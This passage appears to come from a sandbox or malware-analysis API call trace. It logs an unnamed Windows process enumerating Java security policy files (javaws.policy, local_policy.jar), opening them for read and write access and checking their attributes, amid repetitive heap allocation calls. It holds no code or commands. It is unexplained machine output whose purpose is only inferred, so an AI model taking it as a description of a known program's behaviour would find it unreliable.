hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.889] AreFileApisANSI () returned 1 [0097.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy", lpUsedDefaultChar=0x0) returned 62 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.890] AreFileApisANSI () returned 1 [0097.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0097.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 62 [0097.890] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.890] GetFileType (hFile=0x33c) returned 0x1 [0097.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.890] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.890] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.891] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.891] CloseHandle (hObject=0x33c) returned 1 [0097.891] AreFileApisANSI () returned 1 [0097.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e250 [0097.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 62 [0097.891] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.891] GetFileType (hFile=0x33c) returned 0x1 [0097.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0097.891] CloseHandle (hObject=0x33c) returned 1 [0097.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.893] AreFileApisANSI () returned 1 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0097.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy") returned 62 [0097.893] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x62)) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.893] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xdc7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="local_policy.jar", cAlternateFileName="LOCAL_~1.JAR")) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0097.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0097.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0097.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0097.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.894] AreFileApisANSI () returned 1 [0097.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar", lpUsedDefaultChar=0x0) returned 65 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.894] AreFileApisANSI () returned 1 [0097.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0097.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82208 [0097.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 65 [0097.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.894] GetFileType (hFile=0x33c) returned 0x1 [0097.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0097.895] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.895] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.895] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.895] CloseHandle (hObject=0x33c) returned 1 [0097.895] AreFileApisANSI () returned 1 [0097.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0097.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82448 [0097.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 65 [0097.895] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.896] GetFileType (hFile=0x33c) returned 0x1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0097.896] CloseHandle (hObject=0x33c) returned 1 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.897] AreFileApisANSI () returned 1 [0097.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0097.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82718 [0097.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar") returned 65 [0097.897] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xdc7)) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0097.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.897] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, 